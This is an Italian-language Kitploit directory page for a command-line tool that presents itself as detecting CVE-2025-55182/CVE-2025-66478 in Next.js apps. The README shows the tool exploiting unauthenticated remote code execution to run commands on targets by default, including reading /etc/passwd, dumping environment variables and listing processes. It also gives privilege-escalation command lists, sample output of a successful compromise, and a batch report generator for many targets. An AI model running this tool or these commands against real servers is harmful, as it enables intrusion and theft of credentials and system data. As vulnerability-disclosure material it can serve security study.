Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182 — Uno strumento da riga di comando per rilevare CVE-2025-55182 e CVE-2025-66478 nelle applicazioni Next.js che utilizzano React Server Components. | Kitploit
Strumenti/GitHubGitHub/rix4uni/cve-2025-55182
RicognizioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingCommand and Control
GitHubrix4uni/cve-2025-55182

CVE-2025-55182

Uno strumento da riga di comando per rilevare CVE-2025-55182 e CVE-2025-66478 nelle applicazioni Next.js che utilizzano React Server Components.

Vedi Repository
613 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182

Uno strumento da riga di comando per rilevare CVE-2025-55182 e CVE-2025-66478 in applicazioni Next.js che utilizzano React Server Components.

🚀 Installazione

root@kitploit:~
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator

🛠️ Utilizzo

Scanner CVE-2025-55182

Sintassi di base

root@kitploit:~
CVE-2025-55182 -d https://example.com

Opzioni

Nota: se non viene fornita alcuna opzione di comando, vengono eseguiti i comandi predefiniti.

Comandi predefiniti

Lo strumento esegue questi comandi per impostazione predefinita:

  1. cat /etc/os-release - Informazioni sul sistema operativo
  2. whoami - Utente corrente
  3. pwd - Directory di lavoro corrente
  4. id - ID utente e gruppi
  5. uname -a - Informazioni sul sistema
  6. hostname -I - Interfacce di rete
  7. ls -la - Elenco dei file della directory
  8. cat /etc/passwd - Account utente
  9. env - Variabili d'ambiente
  10. ps aux - Processi in esecuzione

Generatore di report

Lo strumento reportgenerator genera automaticamente report professionali di divulgazione delle vulnerabilità a partire dai risultati delle scansioni.

Caratteristiche

  • Scansione parallela di più destinazioni
  • Numerazione automatica che preserva i report esistenti (nessuna sovrascrittura)
  • Report Markdown professionali con sezione di divulgazione delle vulnerabilità di sicurezza
  • Nome del ricercatore personalizzabile e file di input

Utilizzo di base

root@kitploit:~
# Create a file with target domains
echo -e "https://target1.com\nhttps://target2.com" > subs.txt

# Run report generator
reportgenerator

Opzioni

FlagDescrizionePredefinito
--fileFile di input contenente i domini di destinazionesubs.txt
--userNome del ricercatore per la sezione di divulgazioneBhagirath Saxena

Esempi

root@kitploit:~
# Use default settings (subs.txt, Bhagirath Saxena)
reportgenerator

# Use custom target file
reportgenerator --file targets.txt

# Use custom researcher name
reportgenerator --user "John Doe"

# Use both custom options
reportgenerator --file my-targets.txt --user "Jane Smith"

Struttura dell'output

I report vengono generati in due directory:

  • textfile/ - Output grezzo della scansione (numerato: 1.txt, 2.txt, ecc.)
  • mdfile/ - Report Markdown professionali (numerati: 1.md, 2.md, ecc.)

Nota: la funzione di numerazione automatica garantisce che i report esistenti non vengano mai sovrascritti. Le nuove scansioni continuano dal numero esistente più alto.

Formato del report

Ogni report generato include:

  1. Divulgazione di vulnerabilità di sicurezza - Lettera introduttiva professionale
  2. Obiettivo - Il dominio testato
  3. Comandi eseguiti - Elenco dei comandi eseguiti durante il test
  4. Riepilogo della vulnerabilità - Dettagli della CVE e valutazione dell'impatto
  5. Dettagli dello sfruttamento - Output dei comandi con stato di esecuzione
  6. Riepilogo dell'esecuzione - Tabella che mostra l'esito (successo/insuccesso) di ogni comando
  7. Analisi dell'impatto - Valutazione della gravità e osservazioni
  8. Raccomandazioni - Passaggi di remediation per il team di sicurezza
  9. Riferimenti - Collegamenti ai dettagli della CVE e agli advisory di sicurezza

🎨 Esempi di output

Sfruttamento riuscito

root@kitploit:~
▼ 🎯 TARGET: https://vulnerable-app.com
▼ 📋 COMMANDS TO RUN: 10
  • cat /etc/os-release
  • whoami
  • pwd
  • id
  • uname -a
  • hostname -I
  • ls -la
  • cat /etc/passwd
  • env
  • ps aux

[1/10] Executing: cat /etc/os-release
▼ 💻 OS INFORMATION
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...

[2/10] Executing: whoami
▼ 👤 CURRENT USER
║ www-data
...

[3/10] Executing: pwd
▼ 📂 CURRENT DIRECTORY
║ /var/www/html
...

Successo parziale

root@kitploit:~
[6/10] Executing: hostname -I
╔════════════════════════════════════════════════════════════╗
║ Command failed: hostname -I
║ This command might not be available or the server rejected it
╚════════════════════════════════════════════════════════════╝

[!] Trying alternative network command...
▼ 🌐 NETWORK INTERFACES (alternative)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║     inet 127.0.0.1/8 scope host lo
║        valid_lft forever preferred_lft forever
...

🔧 Dettagli tecnici

Vulnerabilità

  • CVE: CVE-2025-55182
  • Tipo: Prototype Pollution → RCE
  • Interessate: applicazioni Next.js con configurazioni specifiche
  • Vettore: HTTP POST con multipart/form-data appositamente predisposto
  • Impatto: esecuzione remota di codice non autenticata come utente dell'applicazione

📚 Riferimenti

  • Dettagli di CVE-2025-55182
  • Advisory di sicurezza di Next.js

Esempi della directory commands/:

Crea file di comandi di esempio per diversi scenari:

root@kitploit:~
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
root@kitploit:~
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
root@kitploit:~
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
Scarica lo strumento
OpzioneDescrizionePredefinito
-d, --domainURL di destinazione (aggiunge automaticamente https:// se non è presente alcun protocollo)http://localhost:3000
-c, --commandSingolo comando da eseguire-
-m, --multiplePiù comandi separati da punto e virgola-
-f, --fileFile contenente i comandi (uno per riga)-
-h, --helpMostra il messaggio di aiuto-